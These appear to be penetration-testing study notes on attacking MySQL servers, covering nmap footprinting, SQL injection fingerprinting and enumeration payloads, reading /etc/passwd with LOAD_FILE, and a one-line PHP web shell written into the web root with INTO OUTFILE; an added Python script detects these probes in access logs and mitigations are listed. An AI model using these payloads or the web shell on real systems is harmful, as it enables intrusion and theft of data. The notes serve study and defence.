MySQL (3306)

CVE-2012-2122 in MySQL 5.6.x

Footprinting using nmap

sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*

Interacting with the MySQL server

Without a password:

mysql -u root -h 10.129.14.132

With a password:

mysql -u root -pP4SSw0rd -h 10.129.14.128

Commands

Command | Description
--- | ---
mysql -u <user> -p<password> -h <IP address> | Connect to the MySQL server. There must be no space between the -p flag and the password.
show databases; | Show all databases.
use <database>; | Select one of the existing databases.
show tables; | Show all available tables in the selected database.
show columns from <table>; | Show all columns in the selected table.
select * from <table>; | Show everything in the desired table.
select * from <table> where <column> = "<string>"; | Search for the needed string in the desired table.
INSERT INTO logins VALUES(1, 'admin', 'p@ssw0rd', '2020-07-02'); | Insert a row of values.
describe <table>; | Show table columns and data types.

Types of SQL Injection

Footprinting

How to check whether the DB is MySQL

Payload | When to use | Expected output | Wrong output
--- | --- | --- | ---
SELECT @@version | When we have full query output | MySQL version, e.g. 10.3.22-MariaDB-1ubuntu1 | In MSSQL it returns the MSSQL version; error with other DBMS.
SELECT POW(1,1) | When we only have numeric output | 1 | Error with other DBMS
SELECT SLEEP(5) | Blind / no output | Delays the page response for 5 seconds and returns 0. | Will not delay the response with other DBMS

Getting Schema Names and Tables

SELECT schema_name FROM information_schema.schemata;

SELECT table_name FROM information_schema.tables WHERE table_schema=database();

SELECT column_name FROM information_schema.columns WHERE table_name='<table>';

Reading Files

Getting Username

SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user

Getting User Privileges

SELECT super_priv FROM mysql.user
SELECT grantee, privilege_type FROM information_schema.user_privileges

Reading a file

SELECT LOAD_FILE('/etc/passwd');

Writing Files

Prerequisites

  1. User with the FILE privilege enabled

  2. MySQL global secure_file_priv variable not restricting the path (empty)

  3. Write access to the target location on the back-end server

Check secure_file_priv

SHOW VARIABLES LIKE 'secure_file_priv';
SELECT variable_name, variable_value FROM information_schema.global_variables WHERE variable_name="secure_file_priv";

Note: if secure_file_priv is empty, files can be written anywhere the MySQL process has write access; if it names a directory, reads and writes are confined to that directory; if it is NULL, LOAD_FILE and INTO OUTFILE are disabled entirely.

Writing to a file

SELECT * from users INTO OUTFILE '/tmp/credentials';

Finding the base web dir

Tip: Advanced file exports use the 'FROM_BASE64("base64_data")' function to write long or binary files.

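As an added example that is not part of the original notes, the following Python script flags the MySQL-specific probes and file primitives listed above (@@version, SLEEP(), POW(1,1), information_schema enumeration, LOAD_FILE, INTO OUTFILE, FROM_BASE64) when they show up in web-server access logs; the log lines are constructed sample data and the signature names are labels chosen for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access log lines (sample data, not from the original notes).
SAMPLE_LOG = """\
10.0.0.5 - - [02/Jul/2020:10:01:02 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [02/Jul/2020:10:01:07 +0000] "GET /item.php?id=1%20UNION%20SELECT%20@@version HTTP/1.1" 200 640
10.0.0.9 - - [02/Jul/2020:10:01:09 +0000] "GET /item.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512
10.0.0.9 - - [02/Jul/2020:10:01:15 +0000] "GET /item.php?id=1%20UNION%20SELECT%20LOAD_FILE(%27/etc/passwd%27) HTTP/1.1" 200 2048
10.0.0.9 - - [02/Jul/2020:10:01:20 +0000] "GET /item.php?id=1%20UNION%20SELECT%20schema_name%20FROM%20information_schema.schemata HTTP/1.1" 200 800
10.0.0.7 - - [02/Jul/2020:10:02:00 +0000] "GET /search.php?q=sleep+well HTTP/1.1" 200 300
"""

# Signature names are labels chosen for this example; each pattern fingerprints one
# of the MySQL-specific probes or file primitives from the sections above.
SIGNATURES = {
    "version_probe": r"@@version",
    "numeric_probe": r"\bpow\s*\(\s*1\s*,\s*1\s*\)",
    "time_based": r"\bsleep\s*\(\s*\d+\s*\)",
    "schema_enum": r"\binformation_schema\.(schemata|tables|columns|user_privileges)\b",
    "user_enum": r"\bmysql\.user\b|\bcurrent_user\s*\(\s*\)",
    "file_read": r"\bload_file\s*\(",
    "file_write": r"\binto\s+(out|dump)file\b",
    "secure_file_priv": r"secure_file_priv",
    "b64_payload": r"\bfrom_base64\s*\(",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in SIGNATURES.items()}
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

def scan_log(text):
    """Return one (ip, timestamp, signature, decoded_target) tuple per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        # URL-decode first so %20/%27 and '+' do not hide the payload; the decoded
        # form also keeps a benign search for "sleep well" from tripping the SLEEP() rule.
        target = unquote_plus(m.group("target"))
        for name, rx in COMPILED.items():
            if rx.search(target):
                findings.append((m.group("ip"), m.group("ts"), name, target))
    return findings

if __name__ == "__main__":
    for ip, ts, name, target in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {name}: {target}")
```

Feeding a real access log through scan_log() gives a quick triage list of which of the probes above a source tried, and in what order.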
SQLi Mitigation

  • Input sanitization via mysqli_real_escape_string

  • Input validation, e.g. via regex

  • Limiting user privileges

  • Using a WAF

  • Parameterized queries via mysqli_stmt_bind_param

Misconfigurations

  • Anonymous access is enabled

  • Users without a password

Privileges

  • Read or change the contents of a database

  • Read or change the server configuration

  • Execute commands

  • Read local files

  • Communicate with other databases

  • Capture the local system hash

  • Impersonate existing users

  • Gain access to other networks

Protocol Specific Attacks

Code execution

Not common, but it can be encountered, since MySQL supports user-defined functions written in C/C++.

Write Local Files

mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
mysql> show variables like "secure_file_priv"; # must be empty so we can write

Reading Local Files

mysql> select LOAD_FILE("/etc/passwd");

Note: by default, this is not enabled
